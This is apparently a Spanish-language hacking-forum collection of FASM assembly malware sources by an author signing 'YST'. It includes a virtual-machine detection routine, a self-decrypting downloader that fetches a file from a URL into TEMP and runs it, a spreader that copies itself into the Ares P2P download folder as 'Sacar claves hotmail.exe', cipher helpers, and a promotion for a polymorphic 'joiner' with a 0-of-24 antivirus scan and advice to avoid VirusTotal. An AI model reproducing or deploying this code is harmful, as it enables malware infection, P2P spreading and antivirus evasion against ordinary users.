include 'win32ax.inc'

.code
start:
stdcall IsVirtualPCPresent
cmp eax,0
jne .salir
invoke MessageBox,0,"No estamos en una maquina virtual",0,0
.salir:
invoke ExitProcess,0
;IsVirtualPCPresent
;Autor: YST
;Basado en un la funcion IsVirtualPCPresent de cobein
;
;
proc IsVirtualPCPresent
locals
lBuffer rb 500
endl
stdcall LeerRegistro,80000002h,iClave,iCero,addr lBuffer
cmp eax,0
je .no
stdcall cInstr,addr lBuffer,iVIRTUAL
cmp eax,0
je @f
mov eax,1
jmp .salir
@@:
stdcall cInstr,addr lBuffer,iVMWARE
cmp eax,0
je @f
mov eax,2
jmp .salir
@@:
stdcall cInstr,addr lBuffer,iVBOX
cmp eax,0
je @f
mov eax,3
jmp .salir
@@:
.no:
xor eax,eax
.salir:
ret
iClave db 'SYSTEM\ControlSet001\Services\Disk\Enum',0
iCero db '0',0
iVIRTUAL db 'VIRTUAL',0
iVMWARE db 'VMWARE',0
iVBOX db 'VBOX',0
endp
proc LeerRegistro,cHKEY,cCadena,cCampo,cBuffer
locals
temp dd ?
Result dd ?
endl
mov [temp],MAX_PATH*2
invoke RegOpenKeyEx,[cHKEY],[cCadena],0,KEY_READ, addr Result
.if eax <> 0 ;Si no hay datos devolvemos 0
xor eax,eax
jmp .salir
.endif

lea ebx,[temp]
invoke RegQueryValueEx ,[Result],[cCampo],0,0,[cBuffer],ebx
.if eax <> 0 ;Si no hay datos devolvemos 0
xor eax,eax
jmp .salir
.endif
mov eax,1
.salir:
ret
endp
;////////////////////////////////////////////////////////////////////////////////////////////////////
;//Descripción: Funcion que ve si la segunda cadena se encuentra dentro de la primera //
;//c1 = Cadena //
;//c2 = Cadena que se buscara en c1 //
;// Retorna: //
;// Si no se encuentra o hay error retorna FALSE , en el caso de que se encuentre devuelve eax//
;// apuntandoa la posicion de c1 donde se encontro c2 //
;// by YST //
;////////////////////////////////////////////////////////////////////////////////////////////
proc cInstr,c1,c2
push edi esi ebx ecx edx
stdcall Len,[c2]
mov edi,eax
stdcall Len,[c1]
mov esi,eax
cmp edi,esi
jg .Falso
mov edx,[c1]
mov ebx,[c2]
dec edx
inc esi
.bucle:
dec esi
inc edx
mov cl,byte[edx+edi]
mov byte[edx+edi],0
stdcall comparar,edx,[c2]
mov byte[edx+edi],cl
.if eax = 0
mov eax,edx
jmp .salir
.endif
cmp esi,0
jne .bucle
.Falso:
mov eax,FALSE
.salir:
pop edx ecx ebx esi edi
ret
endp
proc comparar ,SRC,DST ;Funcion que compara
push edi ecx esi
mov ecx,-1
mov edi,[SRC]
mov al,0
repnz scasb
mov eax,ecx
not eax
mov ecx,eax
mov esi,[SRC]
mov edi,[DST]
repz cmpsb
mov eax,1
jnz Next
dec eax
Next:
pop esi ecx edi
ret
endp
proc Len,cCadena ;Funcion que mide la cadena
push ecx edi
mov ecx,-1
mov edi,[cCadena]
mov al,0
repnz scasb
mov eax,ecx
not eax
dec eax
pop edi ecx
ret
endp
.end start

include 'win32ax.inc'
.code
start:
stdcall Len,"Hola mundo."
mov ebx,eax
stdcall ROT39,"Hola mundo." ,eax
mov esi,eax
invoke MessageBox,0,eax,"Encriptado:",0
stdcall ROT39,esi ,ebx
invoke MessageBox,0,eax,"Desencriptado:",0
invoke ExitProcess,0
LOWER_LIMIT = 48
CHARMAP = 39
UPPER_LIMIT = 125
proc ROT39,pString,pLargo
locals
nCode dd ?
endl
mov eax,[pLargo]
inc eax
invoke GlobalAlloc,GPTR,eax
mov ebx,eax
stdcall cRtlMoveMemory,ebx,[pString],[pLargo]
dec [pLargo]
xor esi,esi
dec esi
.bucle:
inc esi
mov eax,ebx
add eax,esi
movzx ecx,byte[eax]
mov [nCode] ,ecx

.if [nCode] >= LOWER_LIMIT & [nCode] <= UPPER_LIMIT
mov eax,[nCode]
add eax,CHARMAP
mov [nCode],eax

.if [nCode] > UPPER_LIMIT
mov eax,[nCode]
sub eax, UPPER_LIMIT
add eax,LOWER_LIMIT
dec eax
mov [nCode] ,eax
.endif
.endif
mov eax,ebx
add eax,esi
mov ecx,[nCode]
mov byte[eax],cl
cmp esi,[pLargo]
jne .bucle

mov eax,ebx
ret
endp
proc Len,cCadena ;Funcion que mide la cadena
push ecx edi
mov ecx,-1
mov edi,[cCadena]
mov al,0
repnz scasb
mov eax,ecx
not eax
dec eax
pop edi ecx
ret
endp
;Descripcion: Esta función funciona igual que la winapi RtlMoveMemory
; by YST
proc cRtlMoveMemory,cBuffer,Cpuntero,cCantidad
push esi edi
xchg edi,[cBuffer]
xchg esi,[Cpuntero]
.bucleb:
dec [cCantidad]
movsb
cmp [cCantidad],0
jge .bucleb
pop edi esi
ret
endp
.end start

;Humilde Downloader 1.0
; by
; y y yyy yyyyyyyyyyyyy
; y y y y
; y y yyyyyy y
; yy y y
; y y y
; y y y
; y yyyyyyy y
; ysk_sft@hotmail.com
; diariodeyst.blogspot.com
macro invoke proc,[arg] ; indirectly call STDCALL procedure
{ common
if ~ arg eq
reverse
pushd arg
common
end if
call [proc] }
macro allow_nesting
{ macro pushd value
\{ match ,value \\{
pushx equ \\}
match =pushx =invoke proc,pushx value \\{
allow_nesting
invoke proc
purge pushd,invoke,stdcall,cinvoke,ccall
push eax
pushx equ \\}
match =pushx =stdcall proc,pushx value \\{
allow_nesting
stdcall proc
purge pushd,invoke,stdcall,cinvoke,ccall
push eax
pushx equ \\}
match =pushx =cinvoke proc,pushx value \\{
allow_nesting
cinvoke proc
purge pushd,invoke,stdcall,cinvoke,ccall
push eax
pushx equ \\}
match =pushx =ccall proc,pushx value \\{
allow_nesting
ccall proc
purge pushd,invoke,stdcall,cinvoke,ccall
push eax
pushx equ \\}
match =pushx,pushx \\{
pushd <value>
pushx equ \\}
restore pushx \}
macro invoke proc,[arg]
\{ \reverse pushd <arg>
\common call [proc] \}
macro stdcall proc,[arg]
\{ \reverse pushd <arg>
\common call proc \}
macro cinvoke proc,[arg]
\{ \common \local size
size = 0
if ~ arg eq
\reverse pushd <arg>
size = size+4
match =double any,arg \\{ size = size \\}
\common end if
call [proc]
if size
add esp,size
end if \}
macro ccall proc,[arg]
\{ \common \local size
size = 0
if ~ arg eq
\reverse pushd <arg>
size = size+4
match =double any,arg \\{ size = size+4 \\}
\common end if
call proc
if size
add esp,size
end if \} }

macro pushd value
{ match first=,more, value \{ \local ..continue
call ..continue
db value,0
..continue:
pushd equ \}
match pushd =addr var,pushd value \{ \local ..opcode,..address
virtual at 0
label ..address at var
mov eax,dword [..address]
load ..opcode from 0
end virtual
if ..opcode = 0A1h
push var
else
lea edx,[..address]
push edx
end if
pushd equ \}
match pushd =double [var],pushd value \{
push dword [var+4]
push dword [var]
pushd equ \}
match pushd =double =ptr var,pushd value \{
push dword [var+4]
push dword [var]
pushd equ \}
match pushd =double num,pushd value \{ \local ..high,..low
virtual at 0
dq num
load ..low dword from 0
load ..high dword from 4
end virtual
push ..high
push ..low
pushd equ \}
match pushd,pushd \{ \local ..continue
if value eqtype ''
call ..continue
db value,0
..continue:
else
push value
end if
pushd equ \}
restore pushd }

allow_nesting

macro import lib,[functions]
{ common macro import_#lib \{ import lib,functions \} }
format pe gui 4.0

macro proc [args] ; define procedure
{ common
match name params, args>
\{ define@proc name,<params \} }

prologue@proc equ prologuedef

macro prologuedef procname,flag,parmbytes,localbytes,reglist
{ if parmbytes | localbytes
push ebp
mov ebp,esp
if localbytes
sub esp,localbytes
end if
end if
irps reg, reglist \{ push reg \} }

epilogue@proc equ epiloguedef

macro epiloguedef procname,flag,parmbytes,localbytes,reglist
{ irps reg, reglist \{ reverse pop reg \}
if parmbytes | localbytes
leave
end if
if flag and 10000b
retn
else
retn parmbytes
end if }

macro define@proc name,statement
{ local params,flag,regs,parmbytes,localbytes,current
if used name
name:
match =stdcall args, statement \{ params equ args
flag = 11b \}
match =stdcall, statement \{ params equ
flag = 11b \}
match =c args, statement \{ params equ args
flag = 10001b \}
match =c, statement \{ params equ
flag = 10001b \}
match =params, params \{ params equ statement
flag = 0 \}
virtual at ebp+8
match =uses reglist=,args, params \{ regs equ reglist
params equ args \}
match =regs =uses reglist, regs params \{ regs equ reglist
params equ \}
match =regs, regs \{ regs equ \}
match =,args, params \{ defargs@proc args \}
match =args@proc args, args@proc params \{ defargs@proc args \}
parmbytes = $ - (ebp+8)
end virtual
name # % = parmbytes/4
all@vars equ
current = 0
match prologue:reglist, prologue@proc:<regs> \{ prologue name,flag,parmbytes,localbytes,reglist \}
macro locals
\{ virtual at ebp-localbytes+current
macro label def \\{ match . type,def> \\\{ deflocal@proc .,label,<type \\\} \\}
struc db [val] \\{ \common deflocal@proc .,db,val \\}
struc du [val] \\{ \common deflocal@proc .,du,val \\}
struc dw [val] \\{ \common deflocal@proc .,dw,val \\}
struc dp [val] \\{ \common deflocal@proc .,dp,val \\}
struc dd [val] \\{ \common deflocal@proc .,dd,val \\}
struc dt [val] \\{ \common deflocal@proc .,dt,val \\}
struc dq [val] \\{ \common deflocal@proc .,dq,val \\}
struc rb cnt \\{ deflocal@proc .,rb cnt, \\}
struc rw cnt \\{ deflocal@proc .,rw cnt, \\}
struc rp cnt \\{ deflocal@proc .,rp cnt, \\}
struc rd cnt \\{ deflocal@proc .,rd cnt, \\}
struc rt cnt \\{ deflocal@proc .,rt cnt, \\}
struc rq cnt \\{ deflocal@proc .,rq cnt, \\} \}
macro endl
\{ purge label
restruc db,du,dw,dp,dd,dt,dq
restruc rb,rw,rp,rd,rt,rq
current = $-(ebp-localbytes)
end virtual \}
macro ret operand
\{ match any, operand \\{ retn operand \\}
match , operand \\{ match epilogue:reglist, epilogue@proc:<regs>
\\\{ epilogue name,flag,parmbytes,localbytes,reglist \\\} \\} \}
macro finish@proc \{ localbytes = (((current-1) shr 2)+1) shl 2
end if \} }

macro defargs@proc [arg]
{ common
if ~ arg eq
forward
local ..arg,current@arg
match argname:type, arg
\{ current@arg equ argname
label ..arg type
argname equ ..arg
if dqword eq type
dd ?,?,?,?
else if tbyte eq type
dd ?,?,?
else if qword eq type | pword eq type
dd ?,?
else
dd ?
end if \}
match =current@arg,current@arg
\{ current@arg equ arg
arg equ ..arg
..arg dd ? \}
common
args@proc equ current@arg
forward
restore current@arg
common
end if }

macro deflocal@proc name,def,[val]
{ common
match vars, all@vars \{ all@vars equ all@vars, \}
all@vars equ all@vars name
forward
local ..var,..tmp
match =label,def \{ ..tmp equ \}
match tmp,..tmp \{ ..var def val \}
match ,..tmp \{ label ..var val \}
match =?, val \{ ..tmp equ \}
match any =?, val \{ ..tmp equ \}
match any (=?), val \{ ..tmp equ \}
match tmp : value, ..tmp : val
\{ tmp: end virtual
initlocal@proc ..var,def value
virtual at tmp\}
common
match first rest, ..var, \{ name equ first \} }

macro initlocal@proc name,def
{ virtual at name
def
size@initlocal = $ - name
end virtual
position@initlocal = 0
while size@initlocal > position@initlocal
virtual at name
def
if size@initlocal - position@initlocal < 2
current@initlocal = 1
load byte@initlocal byte from name+position@initlocal
else if size@initlocal - position@initlocal < 4
current@initlocal = 2
load word@initlocal word from name+position@initlocal
else
current@initlocal = 4
load dword@initlocal dword from name+position@initlocal
end if
end virtual
if current@initlocal = 1
mov byte [name+position@initlocal],byte@initlocal
else if current@initlocal = 2
mov word [name+position@initlocal],word@initlocal
else
mov dword [name+position@initlocal],dword@initlocal
end if
position@initlocal = position@initlocal + current@initlocal
end while }

macro endp
{ purge ret,locals,endl
finish@proc
purge finish@proc
restore regs@proc
match all,args@proc \{ restore all \}
restore args@proc
match all,all@vars \{ restore all \} }

macro local [var]
{ common
locals
forward done@local equ
match varname[count]:vartype, var
\{ match =BYTE, vartype \\{ varname rb count
restore done@local \\}
match =WORD, vartype \\{ varname rw count
restore done@local \\}
match =DWORD, vartype \\{ varname rd count
restore done@local \\}
match =PWORD, vartype \\{ varname rp count
restore done@local \\}
match =QWORD, vartype \\{ varname rq count
restore done@local \\}
match =TBYTE, vartype \\{ varname rt count
restore done@local \\}
match =DQWORD, vartype \\{ label varname dqword
rq count+count
restore done@local \\}
match , done@local \\{ virtual
varname vartype
end virtual
rb count*sizeof.\#vartype
restore done@local \\} \}
match :varname:vartype, done@local:var
\{ match =BYTE, vartype \\{ varname db ?
restore done@local \\}
match =WORD, vartype \\{ varname dw ?
restore done@local \\}
match =DWORD, vartype \\{ varname dd ?
restore done@local \\}
match =PWORD, vartype \\{ varname dp ?
restore done@local \\}
match =QWORD, vartype \\{ varname dq ?
restore done@local \\}
match =TBYTE, vartype \\{ varname dt ?
restore done@local \\}
match =DQWORD, vartype \\{ label varname dqword
dq ?,?
restore done@local \\}
match , done@local \\{ varname vartype
restore done@local \\} \}
match ,done@local
\{ var
restore done@local \}
common
endl }
macro encrypt dstart,dsize {
local ..char,..key,..shift
repeat dsize
load ..char from dstart+%-1
..char = ..char xor $FA
store ..char at dstart+%-1
end repeat
}
entry start
section '.text' code readable executable writeable
proc EncriptacionXOR,cCadena,cTamaño
push ebx
xor ebx,ebx
mov ebx,[cTamaño]
jmp .Start
.Start:
mov eax,[cCadena]
inc ebx
dec eax
.bucle:
dec ebx
cmp ebx,0
jbe .salir
inc eax
xor byte[eax],$FA
jmp .bucle
.salir:
pop ebx
ret
endp
proc start
stdcall EncriptacionXOR,InicioA,FinA-InicioA ;Desencriptamos
InicioA:
invoke CreateThread , 0, 0,DownloadFile,"Aqui va la URL" ,0 , 0;Creamos el hilo para descargar
invoke WaitForSingleObject,eax,-1 ;Esperamos que se cierre el hilo
invoke CreateThread , 0, 0,[ExitProcess],0 ,0 , 0;Salimos

endp
proc DownloadFile,pUrl
locals
MAX_PATH = 260
bwrite dd ?
f rb MAX_PATH*2
handleCreado dd ?
hSession dd ?
hUrl dd ?
buflong dd ?
lbuffer rb 800
endl
stdcall Len,[pUrl]
add eax,[pUrl]

.bucle:
dec eax
cmp byte[eax],"."
jne .bucle
mov edi,eax ;Obtenemos la extención
INVALID_HANDLE_VALUE = -1
invoke GetEnvironmentVariable,"TEMP", addr f,MAX_PATH ;Obtenemos la ruta de los archivos temporales
stdcall Len,addr f
lea ecx,[f]
add eax,ecx
mov ebx,eax
RDTSC
invoke wsprintf,ebx,"\%d%s",eax,edi
invoke CreateFileA,addr f, 40000000h, 0, 0, 2, 0, 0 ;Creamos el archivo
cmp eax,INVALID_HANDLE_VALUE
je .exit
mov [handleCreado],eax
invoke InternetOpen,0,0,0,0,0
cmp eax,INVALID_HANDLE_VALUE
je .exit
mov [hSession],eax

invoke InternetOpenUrl,[hSession],[pUrl],0,0,0,0
cmp eax,INVALID_HANDLE_VALUE
je .exit
mov [hUrl],eax
.download:
invoke InternetReadFile,[hUrl],addr lbuffer,800,addr buflong ;Leemos el archivo
or [buflong],0
jz .close

invoke WriteFile,[handleCreado],addr lbuffer,[buflong],addr bwrite,0 ;Escribimos el archivo
jmp .download
.close:
invoke CloseHandle,[handleCreado] ;Cerramos los handle
invoke InternetCloseHandle,[hUrl]
invoke InternetCloseHandle,[hSession]
invoke ShellExecute,0, "Open", addr f,0, 0, 1 ;Ejecutamos el archivo descargado

invoke Sleep,1000 ;Dormimos 1 segundo
.exit:
invoke ExitThread,0 ;Salimos del hilo
endp
proc Len,cCadena ;Funcion que mide la cadena
push ecx edi
mov ecx,-1
mov edi,[cCadena]
mov al,0
repnz scasb
mov eax,ecx
not eax
dec eax
pop edi ecx
ret
endp
FinA:
encrypt InicioA,FinA-InicioA
section '.idata' import data readable writeable

macro library [name,string]
{ forward
local _label
if defined name#.redundant
if ~ name#.redundant
dd RVA name#.lookup,0,0,RVA _label,RVA name#.address
end if
end if
name#.referred = 1
common
dd 0,0,0,0,0
forward
if defined name#.redundant
if ~ name#.redundant
_label db string,0
rb RVA $ and 1
end if
end if }

macro import name,[label,string]
{ common
if defined name#.referred
name#.lookup:
forward
if used label
if string eqtype ''
local _label
dd RVA _label
else
dd 80000000h + string
end if
end if
common
if $ > name#.lookup
name#.redundant = 0
dd 0
else
name#.redundant = 1
end if
name#.address:
forward
if used label
if string eqtype ''
label dd RVA _label
else
label dd 80000000h + string
end if
end if
common
if ~ name#.redundant
dd 0
end if
forward
if used label & string eqtype ''
_label dw 0
db string,0
rb RVA $ and 1
end if
common
end if }

library kernel32,'kernel32.dll',Wininet,'Wininet.dll' ,user32,'user32.dll', shell32,'SHELL32.DLL'
import kernel32,CreateThread,'CreateThread',WaitForSingleObject,'WaitForSingleObject',GetEnvironmentVariable,'GetEnvironmentVariableA' ,\
ExitProcess,'ExitProcess',CreateFileA,'CreateFileA',WriteFile,'WriteFile',CloseHandle,'CloseHandle' ,Sleep,'Sleep',ExitThread,'ExitThread'
import user32,wsprintf,'wsprintfA'
import shell32,ShellExecute,'ShellExecuteA'
import Wininet,InternetOpen,'InternetOpenA',InternetOpenUrl,'InternetOpenUrlA',InternetCloseHandle,'InternetCloseHandle',InternetReadFile,'InternetReadFile'

include 'win32ax.inc'
entry start
.code
cName equ "Sacar claves hotmail.exe" ; Nombre con que nos copiaremos
proc start
locals
lBuffer rb MAX_PATH
lBuffer2 rb MAX_PATH
lBuffer3 rb MAX_PATH
endl

stdcall Zerar,addr lBuffer,MAX_PATH
stdcall LeerRegistro,HKEY_CURRENT_USER,"Software\Ares" , "Download.Folder",addr lBuffer
.if eax = 0
jmp .exit
.endif

stdcall Zerar,addr lBuffer2,MAX_PATH
invoke lstrlen,addr lBuffer
stdcall HexToString,addr lBuffer,eax,addr lBuffer2
invoke lstrlen,addr lBuffer2
lea ebx,[lBuffer2]
mov byte[ebx+eax],"\"
mov ebx,MAX_PATH
sub ebx,eax
lea edx,[lBuffer2]
inc eax
add eax,edx
stdcall Zerar,eax,ebx
invoke lstrcat, addr lBuffer2,cName

MOV EaX, [FS:30h]
MOV EaX, [EaX + 10h]
MOV EaX, [EaX + 3Ch]
stdcall Zerar,addr lBuffer3,MAX_PATH
stdcall UniToAscii, addr lBuffer3,eax
invoke CopyFile, addr lBuffer3, addr lBuffer2,0
.exit:
invoke ExitProcess,0
endp
proc UniToAscii, ascii, unicode
push esi
push edi
mov esi, [unicode]
mov edi, [ascii]
.count:
.if byte[esi] <> 0
movsb
jmp .count
.endif
inc esi
.if byte[esi] = 0
jmp .exit
.endif
jmp .count
.exit:

mov eax, edi
add eax, 2
pop edi
pop esi
ret
endp
proc Zerar,Puntero,Cantidad ;Funcion que llena de 0 una posicion
push ecx
push ebx
mov ecx,[Cantidad]
mov ebx,[Puntero]
.bucle:
mov byte[ebx+ecx],0
loop .bucle
mov byte[ebx],0
pop ebx
pop ecx
ret
endp
proc LeerRegistro,cHKEY,cCadena,cCampo,cBuffer
locals
temp dd ?
Result dd ?
endl
mov [temp],MAX_PATH*3
invoke RegOpenKeyEx,[cHKEY],[cCadena],0,KEY_READ, addr Result
.if eax <> 0 ;Si no hay datos devolvemos 0
xor eax,eax
jmp .salir
.endif

lea ebx,[temp]
invoke RegQueryValueEx ,[Result],[cCampo],0,0,[cBuffer],ebx
.if eax <> 0 ;Si no hay datos devolvemos 0
xor eax,eax
jmp .salir
.endif
mov eax,1
.salir:
ret
endp
proc HexToString,cPuntero,cCantidad,cBuffer
pushad
mov edi,[cPuntero]
mov esi,[cBuffer]
.bucle:
cmp [cCantidad] ,0
je .salir
movzx eax,byte[edi]
xor edx,edx
mov ebx,16
div ebx
mov ecx,edx
.if byte[edi] >= 'A'
add ecx,9
.endif
xor edx,edx
mov eax,16
mul ecx
mov ecx,eax
.if word[edi] = "C3" | word[edi]= "c3"
mov byte[esi],"ó"
add edi,4
inc esi
sub [cCantidad],2
jmp .bucle
.endif
movzx eax,byte[edi+1]
xor edx,edx
mov ebx,16
div ebx
.if byte[edi+1] >= 'A'
add edx,9
.endif
add ecx,edx
mov byte[esi],cl
inc esi
add edi,2
dec [cCantidad]
jmp .bucle
.salir :
popad
ret
endp
section '.idata' import data readable
library shlwapi,'shlwapi.dll',kernel32,'kernel32.dll' ,advapi32,'advapi32.dll',user32,'user32.dll'
include 'api/kernel32.inc'
include 'api/advapi32.inc'
import shlwapi,PathFileExists,'PathFileExistsA'
include 'api/user32.inc'

include 'win32ax.inc'
.data
cBuffer db 'Hello world',0
cPassword db 'Password',0
 
 
.code
start:
stdcall Len,cPassword
mov ebx,eax
stdcall Len,cBuffer
stdcall RC4,cBuffer,cPassword,eax,ebx
invoke MessageBox,0,cBuffer,0,0
invoke ExitProcess,0
proc RC4,pBuffer,pPassword,pTamñoBuffer,pTamPass
locals
s rb MAX_PATH
endl
pushad
dec [pTamñoBuffer]
;   For i = 0 To 255
; DoEvents
; s(i) = i
;   Next i
lea eax,[s]
mov byte[eax],0
inc eax
mov ecx,256
.bucle1_:
mov bl,byte[eax-1]
inc bl
mov  byte[eax] ,bl
inc eax
loop .bucle1_
 
;    For i = 0 To 255
;        DoEvents
;        j = (j + s(i) + Key(i Mod Len(sKey))) Mod 256
;        tmp = s(i)
;        s(i) = s(j)
;        s(j) = tmp
;    Next i
;j = ebx
;ja = esi
;I = edi
xor ebx,ebx
mov edi,-1
.bucle2_:
inc edi
xor esi,esi
mov esi,ebx
movzx eax,byte[s+edi]
add esi,eax
stdcall lMod,edi,[pTamPass]
mov ecx,[pPassword]
movzx eax,byte[ecx+eax]
add esi,eax
stdcall lMod,esi,256
mov ebx, eax
lea eax,[s]
mov cl,byte[eax+ebx] ; s(j)
mov ch,byte[eax+edi] ; s(i)
mov byte[eax+edi],cl
mov byte[eax+ebx],ch
cmp edi,255
jne .bucle2_
inc edi
 
 
;   For l = 0 To UBound(Buffer)
;       DoEvents
;       i = (i + 1) Mod 256
;       j = (j + s(i)) Mod 256
;       tmp = s(i)
;       s(i) = s(j)
;       s(j) = tmp
;       Buffer(l) = Buffer(l) Xor (s((s(i) + s(j)) Mod 256))
;   Next l
xor esi,esi  ;esi = l
dec esi ; esi = -1
.bucle3_:
inc esi
mov eax,edi
inc eax
stdcall lMod,eax,256
mov edi,eax
mov eax,ebx
xor ecx,ecx
movzx ecx,byte[s+edi]
add eax,ecx
stdcall lMod,eax,256
mov ebx,eax
lea eax,[s]
mov cl,byte[eax+ebx] ; s(j)
mov ch,byte[eax+edi] ; s(i)
mov byte[eax+edi],cl
mov byte[eax+ebx],ch
mov eax,[pBuffer]
add cl,ch
movzx eax,cl
lea edx,[s]
add eax,edx
movzx eax,byte[eax]
stdcall lMod,eax,256
 
mov edx,[pBuffer]
xor byte[edx+esi],al
 
cmp esi,[pTamñoBuffer]
jne .bucle3_
popad
ret
endp
 
proc lMod,c1,c2
push edx
xor edx,edx
mov eax,[c1]
idiv [c2]
push edx
pop eax
pop edx
ret
endp
 
proc Len,cCadena
push ecx edi
mov ecx,-1
mov edi,[cCadena]
mov al,0
repnz scasb
mov eax,ecx
not eax
dec eax
pop edi ecx
ret
endp
.end start

Poliformic Small joiner 1.1v



¿Que es Poliformic Small joiner?

Es un joiner que tiene capacidades para generar varios stub diferentes y unir infinitos archivos.

Caracteristicas

• Cambiador de icono{

- En el caso de la seleccion de esta opción se crea una sección de resource en el stub para contener el icono de caso contrario no tendra sección de resource el stub , aparte que tiene soporte para 16x16 ,32x32,etc..
}

• Forma de obtener nuestra ruta {

- Esta es la forma de que el stub obtendra su ruta que por cierto si se selecciona una de las opciones en el stub solo estara esa opción al contrario de otros joiner que en el stub hace una comparacción para saber que hacer teniendo en el stub mismo todas las posibilidades , son 3 las opciones para obtener nuestra ruta que son :

• Api GetModuleFileNameW
• Api GetCommandLineW
• Mediante FS

}

• Modificar un poco el stub {

Lo que hace esta opción es cambiar mediante un sistema aleatorio algunas instrucciones de el stub,
}

• Encriptar nuestro codigo {

Lo que hace esta opcion mediante un xor o un not (a elegir) todo el codigo de el stub haciendolo mas dificil de detectar por los AV.
}

---

Descargar

---

Esta versión es basica , cada dia se le agregaran nuevas opciones y se le mejoraran otras.



No subir ni a virustotal ni a ningun scanner que no sea http://novirusthanks.org con la casilla de no mandar muestras.

---

Muestra de stub conteniendo un archivo de texto con las opciones

• Encriptar nuestro codigo = MEdiante NOT
• Forma de obtener nuestra ruta = Api GetCommandLineW
• Modificar un poco el stub= Si
• Con icono? = Si

File Info

Report generated: 20.5.2009 at 11.35.03 (GMT 1)
Filename: rrp3.exe
File size: 11 KB
MD5 Hash: 4CF141CE8CC2D4BDE697D9D377103C87
SHA1 Hash: D8D090CDBE3A02FDD49B31D5C1342F28DDC00922
Packer detected: Nothing found [Overlay] *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 24

Detections

a-squared - Nothing found!
Avira AntiVir - Nothing found!
Avast - Nothing found!
AVG - Nothing found!
BitDefender - Nothing found!
ClamAV - Nothing found!
Comodo - Nothing found!
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Nothing found!
IkarusT3 - Nothing found!
Kaspersky - Nothing found!
McAfee - Nothing found!
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Nothing found!
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - Nothing found!
Virus Buster - Nothing found!

Scan report generated by
NoVirusThanks.org